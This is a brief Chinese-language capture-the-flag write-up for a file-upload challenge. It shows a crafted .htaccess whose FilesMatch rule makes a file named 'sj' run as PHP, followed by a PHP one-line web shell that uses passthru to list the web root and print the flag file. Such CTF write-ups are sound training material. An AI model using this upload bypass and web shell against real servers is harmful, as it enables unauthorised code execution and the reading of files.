htaccess

发表于 2021-01-04 分类于 Skill ， Web ，文件上传

Skill | Web | 文件上传 | htaccess

点击此处获得更好的阅读体验

本WP来自webking原创投稿

题目考点

1.构造.htaccess文件

FileMatch 参数即为文件名的正则匹配

1
2
3

<FilesMatch "sj">
 SetHandler application/x-httpd-php
</FilesMatch>

这句意思就是将sj文件当成php解析

我们的一句话木马为

<?php
#passthru("ls /var/www/html/");
passthru("cat /var/www/html/flag_1232123876.php");
?>

先上传.htaccess 上传成功后上传sj文件

sj文件当成php解析即可获取flag